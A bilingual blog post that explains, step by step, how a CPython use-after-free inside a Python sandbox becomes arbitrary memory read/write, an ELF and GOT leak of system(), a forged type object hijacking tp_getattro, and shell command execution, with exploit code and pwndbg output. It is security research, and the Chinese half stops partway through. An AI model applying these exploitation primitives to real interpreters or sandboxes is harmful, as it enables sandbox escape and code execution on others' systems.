bebop404

CPython UAF: Exploit Chain Dev from UAF Trigger to RCE (EN/中文)

Building a full interpreter-level exploit chain from a CPython use-after-free to remote code execution, with pwndbg output at each step.

EN

Author: Ivan

Recently, I discovered and exploited a CPython use-after-free vulnerability inside coze-studio's legacy Python sandbox, building a interpreter-level exploit chain from memory corruption to code execution.

In this blog, I break down each step after triggering the UAF, accompanied by real debugging output in pwndbg.

Environment: Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg

The root cause of the vulnerability is covered in a separate article. This article assumes the following prerequisites: the re-entrant lifetime mismatch has been triggered, the UAF conditions are met, and we are entering the exploitation development phase.


Overview: Exploit Chain Structure

flowchart LR
    UAF --> Primitive --> Leak --> Resolve --> Hijack --> Exec
    UAF[Use After Free]
    Primitive[Arbitrary Memory Access]
    Leak[Binary Base Disclosure]
    Resolve[Dynamic Symbol Resolution]
    Hijack[Function Pointer Hijack]
    Exec[Interpreter Mediated Code Execution]

Step 1: PyByteArrayObject internal structure + fake_ba heap spray

Structure Layout (CPython 3.12)

The bytearray object header at the C layer is PyByteArrayObject, using PyObject_VAR_HEAD (three fields: ob_refcnt / ob_type / ob_size), followed by its own fields:

offset  field        description
+0x00   ob_refcnt    reference count
+0x08   ob_type      points to the bytearray type object
+0x10   ob_size      logical length (Py_SIZE)
+0x18   ob_alloc     physical allocated capacity
+0x20   (internal field)
+0x28   ob_bytes     char*, the actual pointer to the data buffer
+0x30   ob_start     data offset (usually 0)

The critical field is ob_bytes. When bytearray_subscript performs index access, it uses ob_bytes + ob_start + index. If we set ob_bytes to NULL (0), then buf[addr] becomes *(0 + addr), enabling direct read/write access to the physical address addr.

fake_ba construction

The layout of fake_ba in the exploit (exactly corresponding to the fields above):

fake_ba = (
    p64(0x123456) +                         # +0x00 ob_refcnt = fake
    p64(id(bytearray)) +                    # +0x08 ob_type   = real bytearray type
    p64(2**63 - 1) +                        # +0x10 ob_size   = MAX
    p64(2**63 - 1) +                        # +0x18 ob_alloc  = MAX
    p64(0) * 3                              # +0x20.. ob_bytes = 0, ob_start = 0
)

The heap spray writes this template into the freed chunk. Python then internally allocates this memory as a bytearray object — the very object captured by default_handler in the exploit.

I simulated this injection process in pwndbg using ctypes, pausing at BP1 (pre-injection) and BP2 (post-injection) to directly inspect PyByteArrayObject's memory:

[Stage 1]  PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
  BEFORE corruption:
  +0x00  ob_refcnt  = 0x0000000000000001  (1)
  +0x08  ob_type    = 0x0000000000a8cd80
  +0x10  ob_size    = 0x0000000000000100  (256  = logical len)
  +0x18  ob_alloc   = 0x0000000000000101  (257  = capacity)
  +0x20  (internal) = 0x00007ffff760b880
  +0x28  ob_bytes   = 0x00007ffff760b880  (data buffer ptr)
  +0x30  ob_start   = 0x0000000000000000
 
  AFTER  corruption (fake_ba sprayed into freed slot):
  +0x00  ob_refcnt  = 0x0000000000123456  (fake — no GC)
  +0x10  ob_size    = 0x7fffffffffffffff  (= 2^63-1, all bounds pass)
  +0x18  ob_alloc   = 0x7fffffffffffffff  (= 2^63-1)
  +0x28  ob_bytes   = 0x0000000000000000  (NULL → buf[addr] = *(0+addr) = *addr)
  len(buf) = 9223372036854775807  ← Python sees a 9223372036854775807-byte window

ob_size = 0x7fffffffffffffff: Python's len(buf) returns 2^63-1. Any positive integer subscript passes the i >= Py_SIZE(self) check. ob_bytes = NULL: bytearray_subscript calculates ob_bytes + ob_start + i = 0 + 0 + addr = addr, directly accessing the physical address.

pwndbg at BP2 (heap spray completed, paused at os.kill system call return point):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0
 RBX  5
 RCX  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
 RDI  0x11c82
 RSI  5
 R15  0x6a8bcf (os_kill) ◂— endbr64
 RIP  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
0x7ffff7c4553b <kill+11>            cmp    rax, -0xfff
   0x7ffff7c45543 <kill+19>            ret

   0x6a8ba2       <os_kill_impl+52>    cmp    eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
0   0x7ffff7c4553b kill+11
   1         0x6a8ba2 os_kill_impl+52
   2         0x6a8c0f os_kill+64
   3         0x4ff074 cfunction_vectorcall_FASTCALL+103
   4         0x5aa892 _PyEval_EvalFrameDefault+56003

Step 2: Arbitrary read/write primitive

After the window opens, the r64/w64 implementation is straightforward:

r64  = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64  = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))

mem[addr] calls bytearray_subscript, which expands at the C layer to *(ob_bytes + ob_start + addr) = *(0 + 0 + addr) = *(addr). The write path mem.__setitem__(addr, byte) follows bytearray_ass_subscript, similarly writing directly to address addr.

Canary Round-Trip Verification

Canary write test in pwndbg:

[Stage 2]  Arb R/W self-consistency
================================================================
  target: canary_holder @ 0x7ffff74e3ec0
  r64(0x7ffff74e3ec0)  BEFORE write = 0x0000000000000001
  ctypes direct          BEFORE write = 0x0000000000000001
 
  w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
  r64(0x7ffff74e3ec0)  AFTER  write = 0xdeadbeefcafebabe
  ctypes direct          AFTER  write = 0xdeadbeefcafebabe
  [PASS] read-back == 0xdeadbeefcafebabe

Both paths (r64 via mem window vs ctypes direct mapping) read the same value, passing the primitive verification.


Step 3: Leak ELF base address

Exploit the tp_dealloc pointer

id(int) returns the address of PyLong_Type in the static data segment. Within the PyTypeObject structure, tp_dealloc (the destructor pointer) resides at +0x30:

PyTypeObject offset layout:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size
  +0x18  tp_name         (char*)
  +0x20  tp_basicsize
  +0x28  tp_itemsize
  +0x30  tp_dealloc      <- points to a function inside the Python 3 binary
  +0x38  tp_vectorcall_offset
  ...
  +0x90  tp_getattro     <- later hijack target

r64(id(int) + 0x30) reads PyLong_Type.tp_dealloc, which is a function pointer within the Python3 ELF. Page-align it (>> 12 << 12), then scan page by page from the lower address until finding \x7fELF magic — this marks the ELF header.

leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak

pwndbg:

[Stage 3]  ELF base leak
================================================================
  id(int)  =  PyLong_Type @ 0x9a0a20
  r64(PyLong_Type + 0x30)  =  0x4e1d11  (tp_dealloc)
  page-aligned             =  0x4e1000
 
  ELF header @ 0x400000
    magic     = b'\x7fELF'
    e_type    = 0x0002   (2=ET_EXEC, 3=ET_DYN)
    e_machine = 0x003e   (62=EM_X86_64)
    e_entry   = 0x422066
    e_phoff   = 0x40   (14 entries × 56 bytes)

Step 4: Parse system() from .dynamic

The ELF header contains the program header table. Traverse the PHDRs to find an entry of type PT_DYNAMIC (2), whose p_vaddr points to the .dynamic section.

.dynamic contains a series of {d_tag, d_val} pairs (8 bytes each), terminated by d_tag==0 (DT_NULL).

tagValueMeaning
DT_JMPREL (23)d_valStart address of rela.plt (Relocation Table of Imported Functions)
DT_PLTRELSZ (2)d_valTotal bytes of rela.plt
DT_SYMTAB (6)d_val.dynsym Address (symbol table)
DT_STRTAB (5)d_val.dynstr address (symbol name string table)

Each Elf64_Rela entry occupies 24 bytes:

+0   r_offset  (8)  -> corresponding GOT slot address
+8   r_info    (8)  -> upper 32 bits: symbol table index; lower 32 bits: relocation type
+16  r_addend  (8)

Retrieve the symbol name from .dynsym[sym_idx].st_name, then read the string from .dynstr. Once "system" is found, read the GOT value to obtain the runtime system() address (assuming lazy-resolve has completed).

for i in range(dt_pltrelsz // 24):
    rela      = dt_jmprel + i * 24
    r_offset  = r64(rela)           # GOT slot address
    r_info    = r64(rela + 8)
    sym_idx   = r_info >> 32
    st_name   = r32(dt_symtab + sym_idx * 24)
    name      = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset)      # dereference GOT → real system() address
        break

pwndbg:

[Stage 4]  Resolving system() via .dynamic
================================================================
  PT_DYNAMIC: phdr[6]  p_vaddr=0xa8add8  filesz=0x200
  .dynamic resolved @ 0xa8add8
 
  DT_JMPREL  (rela.plt)  = 0x41c8d8   (501 entries)
  DT_SYMTAB              = 0x403818
  DT_STRTAB              = 0x410f28
 
  Found 'system' in rela.plt[106]:
    r_offset  (GOT entry addr)  = 0xa8b350
    sym_idx                      = 106
    GOT[r_offset] (resolved addr)= 0x7ffff7c58750
    first 8 bytes of system()   = f30f1efa4885ff74

0xf30f1efa = endbr64, the starting instruction for libc's system() (CET environment). 0x7ffff7c58750 is the actual libc address, not a PLT stub, confirming lazy-resolve completion.


Step 5: Forge PyTypeObject

What is tp_getattro?

When Python executes obj.attr, the interpreter's execution path is:

LOAD_ATTR bytecode
  -> _PyObject_GetMethod(obj, "attr")
    -> PyObject_GetAttr(obj, name)
      -> f = Py_TYPE(obj)->tp_getattro    <- read func ptr of ob_type
        -> f(obj, name)                   <- indirect call

tp_getattro is located at offset +0x90 within PyTypeObject (based on PyObject_VAR_HEAD's 24 bytes plus field sequences). This is a getattrofunc pointer with prototype:

typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);

If this pointer is modified to system, the interpreter will call system(obj, name) when accessing attributes. In C calling conventions, the first argument is stored in RDI. Since system(const char *command) only reads RDI, the actual effect is equivalent to system(obj) — executing the string at the address of obj.

Constructing fake_type

fake_type = flat(
    0x1000,                              # +0x00  ob_refcnt (high value to avoid GC)
    id(type(int)),                       # +0x08  ob_type (metaclass, keep it "valid")
    b"\x00" * 0x28,                      # +0x10 ~ +0x37  padding (covers ob_size / tp_name /
                                         #                 tp_basicsize / tp_itemsize / tp_dealloc)
    system,                              # +0x38  start placing system()
) + p64(system) * 52                     # keep filling up to +0x38 + 52*8 = +0x1E8
                                         # overwrite tp_getattro(+0x90) and all other slots

Place this bytes segment into a bytes object to keep it active, then fake_type_addr = id(bytes(fake_type)) + 32 (skipping the 32-byte PyBytesObject header to point to the content area).

pwndbg

[Stage 5]  Fake PyTypeObject
================================================================
  fake_type_bytes (PyBytesObject) @ 0xd8be40
  content area (our fake type)    @ 0xd8be60
  int metaclass                   @ 0xaa6b60
 
  Slot inspection (first 20 qwords from fake_type_addr):
    +0x00:  0x0000000000001000  ← ob_refcnt
    +0x08:  0x0000000000aa6b60  ← ob_type (metaclass)
    +0x10:  0x0000000000000000
    +0x18:  0x0000000000000000
    +0x20:  0x0000000000000000
    +0x28:  0x0000000000000000
    +0x30:  0x0000000000000000
    +0x38:  0x00007ffff7c58750  ← tp_vectorcall_offset (also system)
    +0x40:  0x00007ffff7c58750  ← system() [+0x40]
    +0x48:  0x00007ffff7c58750  ← system() [+0x48]
    +0x50:  0x00007ffff7c58750  ← system() [+0x50]
    +0x58:  0x00007ffff7c58750  ← system() [+0x58]
    +0x60:  0x00007ffff7c58750  ← system() [+0x60]
    +0x68:  0x00007ffff7c58750  ← system() [+0x68]
    +0x70:  0x00007ffff7c58750  ← system() [+0x70]
    +0x78:  0x00007ffff7c58750  ← system() [+0x78]
    +0x80:  0x00007ffff7c58750  ← system() [+0x80]
    +0x88:  0x00007ffff7c58750  ← system() [+0x88]
    +0x90:  0x00007ffff7c58750  ← tp_getattro  *** system() ***
    +0x98:  0x00007ffff7c58750  ← system() [+0x98]

pwndbg's x/20gx fake_type_addr verification:

(gdb) x/20gx 0xd8be60
0xd8be60:  0x0000000000001000  0x0000000000aa6b60
0xd8be70:  0x0000000000000000  0x0000000000000000
0xd8be80:  0x0000000000000000  0x0000000000000000
0xd8be90:  0x0000000000000000  0x00007ffff7c58750
0xd8bea0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8beb0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bec0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bed0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bee0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bef0:  0x00007ffff7c58750  0x00007ffff7c58750

0xd8bef0 = 0xd8be60 + 0x90 — tp_getattro slot — indeed points to 0x7ffff7c58750 = system().


Step 6: INCREF trick + fake_obj + RCE

Question: Where does the argument for system() come from?

When tp_getattro(obj, name) is called, obj resides in RDI. system(const char *command) receives RDI as the command string pointer. Thus system() executes the string at obj's address.

We need obj (fake_obj_addr) to point to a Python object containing shell commands, and this object must start with "id\x00..." (or other commands) in its C-layer header — specifically the first 8 bytes of the ob_refcnt field.

The ingenuity of the INCREF trick

Directly storing "id\x00..." as ob_refcnt causes issues: Python's BINARY_SUBSCR (list index access) executes Py_INCREF(item) before returning the element, incrementing ob_refcnt by 1.

Exploiting this behavior: store the command's first byte after decrementing it. The ASCII code for 'i' is 105; decrementing yields 104 = 'h'. After INCREF, 'h' → 'i', making the command valid.

# ob_refcnt initially b"hd\x00\x00\x00\x00\x00\x00" (= "id"[0]-1 + "d")
# BINARY_SUBSCR triggers Py_INCREF: ob_refcnt[0] from 0x68('h') to 0x69('i')
# system(fake_obj_addr) sees string: "id\x00..." = "id"
cmd = bytes([ord('i') - 1]) + b"d\x00\x00\x00\x00\x00\x00"   # b"hd\x00..."
 
fake_obj = cmd + p64(fake_type_addr) + b"\x00" * 0x100
#  [0..7]   ob_refcnt = b"hd\x00..."  <- After Py_INCREF, turns to b"id\x00..."
#  [8..15]  ob_type   = fake_type_addr
#  [16..]   padding

Overwriting the ob_item pointer

Internal structure of list objects:

PyListObject:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size          (len(list))
  +0x18  ob_item          (PyObject **, point to payload array)
  +0x20  allocated

r64(id(payload) + 0x18) reads ob_item (pointing to the slot address of payload[0]), then w64(ob_item_addr, fake_obj_addr) redirects payload[0] to our fake_obj:

payload = [None]
w64(r64(id(payload) + 0x18), fake_obj_addr)   # overwrite ob_item[0]

fake_obj before INCREF:

[Stage 6]  INCREF trick + RCE
================================================================
  fake_obj_bytes @ 0x7ffff74acac0
  fake_obj_addr  @ 0x7ffff74acae0
 
  ob_refcnt bytes BEFORE INCREF:
    raw  : 6864000000000000  (b'hd\x00\x00\x00\x00\x00\x00')
    [0]  : 0x68 = ord('h')  <- NOT 'i' yet
 
  ob_type at +0x08:
    r64(fake_obj_addr+0x08) = 0xd8be60  == fake_type_addr: True
 
  After BINARY_SUBSCR Py_INCREF, ob_refcnt[0] += 1:
    0x680x69 = ord('i')  ← 'i' appears
    system(fake_obj_addr) sees string: 'id'

pwndbg pauses at break PyObject_GetAttr (triggered by payload[0].pwned):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
*RDI  0x7ffff74acae0 ◂— 0x6469 /* 'id' */     ← fake_obj became 'id' after INCREF
*RSI  0x7ffff7505990 ◂— 0xffffffff             ← PyUnicode "pwned"
 RIP  0x504607 (PyObject_GetAttr) ◂— endbr64
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
0x504607 <PyObject_GetAttr>       endbr64
   0x504616 <PyObject_GetAttr+15>    mov    r14, qword ptr [rdi + 8]
                                     R14, [0x7ffff74acae8] => 0xd8be60 ◂— 0x1000
                                     ↑ reads ob_type = fake_type_addr
   0x50461a <PyObject_GetAttr+19>    mov    rax, qword ptr [rsi + 8]
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
0     0x504607 PyObject_GetAttr
   1     0x5a5e02 _PyEval_EvalFrameDefault+36915
   2     0x5b0226 _PyEval_EvalFrame+29

In pwndbg, RDI = 0x7ffff74acae0. pwndbg auto-dereferences to display ◂— 0x6469 /* 'id' */ — precisely the ob_refcnt value after INCREF, little-endian 0x6469 = b"id".

Next, at PyObject_GetAttr+15: mov r14, [rdi+8] loads ob_type into R14 (= 0xd8be60 = fake_type_addr). Then at +50: call rax, where RAX = fake_type->tp_getattro = 0x7ffff7c58750 = system().

GDB output confirms tp_getattro dereferencing and execution:

[pwndbg] Inside PyObject_GetAttr — about to dispatch via ob_type->tp_getattro:
 
  fake_obj  @ 0x7ffff74acae0
  ob_type   @ 0xd8be60  (our fake PyTypeObject)
  tp_getattro (+0x90) = 0x7ffff7c58750  ← will be called as system(fake_obj)
  *fake_obj (command) = b'id\x00\x00\x00\x00\x00\x00'  ('id')

Raw memory of fake_obj (pwndbg x/4gx):

(gdb) x/4gx 0x7ffff74acae0
0x7ffff74acae0:  0x0000000000006469  0x0000000000d8be60
0x7ffff74acaf0:  0x0000000000000000  0x0000000000000000
  • 0x6469 = little-endian b"id" ← INCREF modified first byte
  • 0xd8be60 = fake_type_addr ← ob_type points to our fake type object

Execution result:

uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)

Wrap-up: Complete exploit flow review

From UAF trigger to command execution, no shellcode, no ROP — entirely leveraging the interpreter's own C function pointer dispatch:

  1. fake_ba heap spray modifies a bytearray's ob_bytes to NULL and ob_size to MAX → physical memory window opened
  2. r64/w64 enables arbitrary read/write via bytearray index access
  3. ELF base derived by tracing back from PyLong_Type.tp_dealloc pointer
  4. system() parsed at runtime via ELF's PT_DYNAMIC → rela.plt
  5. fake PyTypeObject sets tp_getattro to system()
  6. Overwrite ob_item to make payload[0] point to a fake Python object, whose ob_refcnt stores the command string
  7. INCREF trick: Exploits Python's BINARY_SUBSCR auto-INCREF to change command's first byte from 'h' (0x68) to 'i' (0x69)
  8. payload[0].pwned triggers PyObject_GetAttr → tp_getattro(obj) → system("id")

(End)


CN

作者:Ivan

最近在研究 Coze Studio 的 legacy Python 沙箱时,发现了一个 CPython 的 use-after-free 漏洞。顺着这个问题往下挖,最终在本地环境里把整条从内存破坏到代码执行的利用链跑通了。

本文为完整版。我将 UAF 触发后的每一步都拆解开来,配上在 pwndbg 中的真实调试输出。

环境:Ubuntu 24.04 x86_64 · python3-dbg 3.12.3 · gdb 15 + pwndbg

漏洞根因另文。本文默认前提:re-entrant lifetime mismatch 已触发,UAF 条件已成立,我们进入利用开发流程。


总览:链路结构

flowchart LR
    UAF --> RW --> Leak --> Resolve --> Hijack --> Exec
    UAF[UAF 触发]
    RW[任意读写]
    Leak[泄露 ELF]
    Resolve[解析 system]
    Hijack[劫持 tp_getattro]
    Exec[system 执行]

第一步:PyByteArrayObject 内部结构 + fake_ba 堆喷

结构布局(CPython 3.12)

bytearray 在 C 层的对象头是 PyByteArrayObject,使用 PyObject_VAR_HEAD(三个字段:ob_refcnt / ob_type / ob_size),然后是自己的字段:

offset  field        说明
+0x00   ob_refcnt    引用计数
+0x08   ob_type      指向 bytearray 类型对象
+0x10   ob_size      逻辑长度(Py_SIZE)
+0x18   ob_alloc     物理分配容量
+0x20   (内部字段)
+0x28   ob_bytes     char*,数据缓冲区的实际指针
+0x30   ob_start     数据偏移(通常为 0)

关键是 ob_bytesbytearray_subscript 做下标访问时用的是 ob_bytes + ob_start + index。如果我们把 ob_bytes 改成 NULL(0),那么 buf[addr] 就变成了 *(0 + addr),即对物理地址 addr 的直接读写。

fake_ba 构造

exploit 中 fake_ba 的布局(精确对应上述字段):

fake_ba = (
    p64(0x123456)                            # +0x00 ob_refcnt = 假值(防 GC)
    p64(id(bytearray))  # +0x08 ob_type = 真 bytearray 类型
    p64(2**63 - 1)                           # +0x10 ob_size  = MAX(所有下标合法)
    p64(2**63 - 1)                           # +0x18 ob_alloc = MAX
    p64(0) * 3                               # +0x20 内部=0, +0x28 ob_bytes=NULL, +0x30 ob_start=0
)

堆喷将此模板写入被释放的 chunk,之后 Python 内部再将这块内存作为 bytearray 对象分配出去——该对象即为 mem(exploit 中 default_handler 捕获的对象)。

我在 pwndbg 中用 ctypes 模拟此喷写过程,在 BP1(喷写前)和 BP2(喷写后)分别暂停,直接查看 PyByteArrayObject 的内存:

[Stage 1]  PyByteArrayObject @ 0x7ffff74e3fb0
================================================================
  BEFORE corruption:
  +0x00  ob_refcnt  = 0x0000000000000001  (1)
  +0x08  ob_type    = 0x0000000000a8cd80
  +0x10  ob_size    = 0x0000000000000100  (256  = logical len)
  +0x18  ob_alloc   = 0x0000000000000101  (257  = capacity)
  +0x20  (internal) = 0x00007ffff760b880
  +0x28  ob_bytes   = 0x00007ffff760b880  (data buffer ptr)
  +0x30  ob_start   = 0x0000000000000000

  AFTER  corruption (fake_ba sprayed into freed slot):
  +0x00  ob_refcnt  = 0x0000000000123456  (fake — no GC)
  +0x10  ob_size    = 0x7fffffffffffffff  (= 2^63-1, all bounds pass)
  +0x18  ob_alloc   = 0x7fffffffffffffff  (= 2^63-1)
  +0x28  ob_bytes   = 0x0000000000000000  (NULL → buf[addr] = *(0+addr) = *addr)
  len(buf) = 9223372036854775807  ← Python sees a 9223372036854775807-byte window

ob_size = 0x7fffffffffffffff:Python 的 len(buf) 返回 2^63-1,任何正整数下标都通过 i >= Py_SIZE(self) 检查。ob_bytes = NULLbytearray_subscript 计算 ob_bytes + ob_start + i = 0 + 0 + addr = addr,直接成为物理地址访问。

pwndbg 在 BP2(堆喷完成,停在 os.kill 系统调用返回点):

─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0
 RBX  5
 RCX  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
 RDI  0x11c82
 RSI  5
 R15  0x6a8bcf (os_kill) ◂— endbr64
 RIP  0x7ffff7c4553b (kill+11) ◂— cmp rax, -0xfff
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x7ffff7c4553b <kill+11>            cmp    rax, -0xfff
   0x7ffff7c45543 <kill+19>            ret
    ↓
   0x6a8ba2       <os_kill_impl+52>    cmp    eax, -1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► 0   0x7ffff7c4553b kill+11
   1         0x6a8ba2 os_kill_impl+52
   2         0x6a8c0f os_kill+64
   3         0x4ff074 cfunction_vectorcall_FASTCALL+103
   4         0x5aa892 _PyEval_EvalFrameDefault+56003

第二步:任意读写原语

窗口打开后,r64 / w64 的实现很直接:

r64  = lambda addr: int.from_bytes(bytes(mem[addr + i] for i in range(8)), 'little')
w64  = lambda addr, val: [mem.__setitem__(addr + i, (val >> 8*i) & 0xff) for i in range(8)]
read = lambda addr, sz: bytes(mem[addr + i] for i in range(sz))

mem[addr] 调用 bytearray_subscript,在 C 层展开为 *(ob_bytes + ob_start + addr) = *(0 + 0 + addr) = *(addr)。写入路径 mem.__setitem__(addr, byte)bytearray_ass_subscript,同样直接写入地址 addr。

自洽性检验(canary round-trip)

pwndbg 中的 canary 写入测试:

[Stage 2]  Arb R/W self-consistency
================================================================
  target: canary_holder @ 0x7ffff74e3ec0
  r64(0x7ffff74e3ec0)  BEFORE write = 0x0000000000000001
  ctypes direct          BEFORE write = 0x0000000000000001

  w64(0x7ffff74e3ec0, 0xdeadbeefcafebabe)
  r64(0x7ffff74e3ec0)  AFTER  write = 0xdeadbeefcafebabe
  ctypes direct          AFTER  write = 0xdeadbeefcafebabe
  [PASS] read-back == 0xdeadbeefcafebabe

两条路径(r64 通过 mem 窗口 vs ctypes 直接映射)读到相同的值,原语验证通过。


第三步:泄露 ELF 基地址

利用 tp_dealloc 指针

id(int) 返回静态数据段中 PyLong_Type 的地址。在 PyTypeObject 结构中,tp_dealloc(析构函数指针)位于 +0x30

PyTypeObject offset layout:
  +0x00  ob_refcnt
  +0x08  ob_type
  +0x10  ob_size
  +0x18  tp_name         (char*)
  +0x20  tp_basicsize
  +0x28  tp_itemsize
  +0x30  tp_dealloc      ← 指向 python3 二进制内的函数
  +0x38  tp_vectorcall_offset
  ...
  +0x90  tp_getattro     ← 后续 hijack 目标

r64(id(int) + 0x30) 读出 PyLong_Type.tp_dealloc,这是 python3 ELF 内的函数指针。将其页对齐(>> 12 << 12),然后向低地址逐页扫描,直到找到 \x7fELF magic——这就是 ELF header。

leak = (r64(id(int) + 0x30) >> 12) << 12
while read(leak, 4) != b"\x7fELF":
    leak -= 0x1000
elf_base = leak

pwndbg:

[Stage 3]  ELF base leak
================================================================
  id(int)  =  PyLong_Type @ 0x9a0a20
  r64(PyLong_Type + 0x30)  =  0x4e1d11  (tp_dealloc)
  page-aligned             =  0x4e1000

  ELF header @ 0x400000
    magic     = b'\x7fELF'
    e_type    = 0x0002   (2=ET_EXEC, 3=ET_DYN)
    e_machine = 0x003e   (62=EM_X86_64)
    e_entry   = 0x422066
    e_phoff   = 0x40   (14 entries × 56 bytes)

第四步:从 .dynamic 解析 system()

ELF header 包含 program header table。遍历 PHDR,找到类型为 PT_DYNAMIC (2) 的条目,其 p_vaddr 指向 .dynamic 节。

.dynamic 包含一系列 {d_tag, d_val} 对(各 8 字节),以 d_tag==0 (DT_NULL) 结束。我们需要找三个 tag:

tag含义
DT_JMPREL (23)d_valrela.plt 起始地址(导入函数重定位表)
DT_PLTRELSZ (2)d_valrela.plt 总字节数
DT_SYMTAB (6)d_val.dynsym 地址(符号表)
DT_STRTAB (5)d_val.dynstr 地址(符号名字符串表)

每条 Elf64_Rela 占 24 字节:

+0  r_offset  (8)  → 对应的 GOT slot 地址
+8  r_info    (8)  → 高 32 位是符号表 index,低 32 位是重定位类型
+16 r_addend  (8)

.dynsym[sym_idx].st_name 获取符号名,再从 .dynstr 读取字符串。找到 "system" 后,读取 GOT 中的值即可得到运行时 system() 地址(前提是已完成 lazy-resolve)。

for i in range(dt_pltrelsz // 24):
    rela      = dt_jmprel + i * 24
    r_offset  = r64(rela)           # GOT slot address
    r_info    = r64(rela + 8)
    sym_idx   = r_info >> 32
    st_name   = r32(dt_symtab + sym_idx * 24)
    name      = read(dt_strtab + st_name, 32).split(b"\x00")[0]
    if name == b"system":
        system = r64(r_offset)      # dereference GOT → real system() address
        break

pwndbg:

[Stage 4]  Resolving system() via .dynamic
================================================================
  PT_DYNAMIC: phdr[6]  p_vaddr=0xa8add8  filesz=0x200
  .dynamic resolved @ 0xa8add8

  DT_JMPREL  (rela.plt)  = 0x41c8d8   (501 entries)
  DT_SYMTAB              = 0x403818
  DT_STRTAB              = 0x410f28

  Found 'system' in rela.plt[106]:
    r_offset  (GOT entry addr)  = 0xa8b350
    sym_idx                      = 106
    GOT[r_offset] (resolved addr)= 0x7ffff7c58750
    first 8 bytes of system()   = f30f1efa4885ff74

0xf30f1efa = endbr64,这是 libc system() 的开头指令(CET 环境)。0x7ffff7c58750 是真实 libc 地址而非 PLT stub,说明符号已完成 lazy-resolve。


第五步:伪造 PyTypeObject

tp_getattro 是什么

当 Python 执行 obj.attr 时,解释器的执行路径为:

LOAD_ATTR 字节码
  → _PyObject_GetMethod(obj, "attr")
    → PyObject_GetAttr(obj, name)
      → f = Py_TYPE(obj)->tp_getattro    ← 读 ob_type 里的函数指针
        → f(obj, name)                   ← 间接调用

tp_getattroPyTypeObject 中的偏移为 +0x90(基于 PyObject_VAR_HEAD 的 24 字节加各字段顺序)。这是一个 getattrofunc 指针,原型为:

typedef PyObject *(*getattrofunc)(PyObject *obj, PyObject *name);

如果将此指针改为 system,解释器访问属性时会调用 system(obj, name)。C 调用约定中第一个参数存于 RDI,而 system(const char *command) 只读取 RDI,实际效果即 system(obj)——执行 obj 地址处的字符串。

构造 fake_type

fake_type = flat(
    0x1000,                              # +0x00  ob_refcnt(高值防 GC)
    id(type(int)),                       # +0x08  ob_type(metaclass,保持合法性)
    b"\x00" * 0x28,                      # +0x10 ~ +0x37  padding(覆盖 ob_size / tp_name /
                                         #                 tp_basicsize / tp_itemsize / tp_dealloc)
    system,                              # +0x38  开始填 system()
) + p64(system) * 52                     # 继续填到 +0x38 + 52×8 = +0x1E8
                                         # 覆盖 tp_getattro(+0x90) 和其他所有 slot

将这段 bytes 放入一个 bytes 对象保持活跃,然后 fake_type_addr = id(bytes(fake_type)) + 32(跳过 PyBytesObject header 的 32 字节,指向内容区)。

pwndbg 内存验证

[Stage 5]  Fake PyTypeObject
================================================================
  fake_type_bytes (PyBytesObject) @ 0xd8be40
  content area (our fake type)    @ 0xd8be60
  int metaclass                   @ 0xaa6b60

  Slot inspection (first 20 qwords from fake_type_addr):
    +0x00:  0x0000000000001000  ← ob_refcnt
    +0x08:  0x0000000000aa6b60  ← ob_type (metaclass)
    +0x10:  0x0000000000000000
    +0x18:  0x0000000000000000
    +0x20:  0x0000000000000000
    +0x28:  0x0000000000000000
    +0x30:  0x0000000000000000
    +0x38:  0x00007ffff7c58750  ← tp_vectorcall_offset (also system)
    +0x40:  0x00007ffff7c58750  ← system() [+0x40]
    +0x90:  0x00007ffff7c58750  ← tp_getattro  *** system() ***

pwndbg 的 x/20gx fake_type_addr 确认:

(gdb) x/20gx 0xd8be60
0xd8be60:  0x0000000000001000  0x0000000000aa6b60
0xd8be70:  0x0000000000000000  0x0000000000000000
0xd8be80:  0x0000000000000000  0x0000000000000000
0xd8be90:  0x0000000000000000  0x00007ffff7c58750
0xd8bea0:  0x00007ffff7c58750  0x00007ffff7c58750
0xd8bef0:  0x00007ffff7c58750  0x00007ffff7c58750

0xd8bef0 = 0xd8be60 + 0x90——tp_getattro slot——确实为 0x7ffff7c58750 = system()


第六步:INCREF trick + fake_obj + RCE

问题:system() 的参数从哪里来

tp_getattro(obj, name) 调用时,obj 位于 RDI。system(const char *command) 接收 RDI 作为命令字符串指针。因此 system() 会执行 obj 地址处的字符串。

我们需要 objfake_obj_addr)指向一个包含 shell 命令的 Python 对象,且该对象在 C 层的开头——即 ob_refcnt 字段的 8 字节——必须为 "id\x00..."(或其他命令)。

INCREF trick 的精妙之处

直接存储 "id\x00..." 作为 ob_refcnt 会遇到问题:Python 的 BINARY_SUBSCR(list 下标访问)在返回元素前会执行 Py_INCREF(item),将 ob_refcnt 加 1。

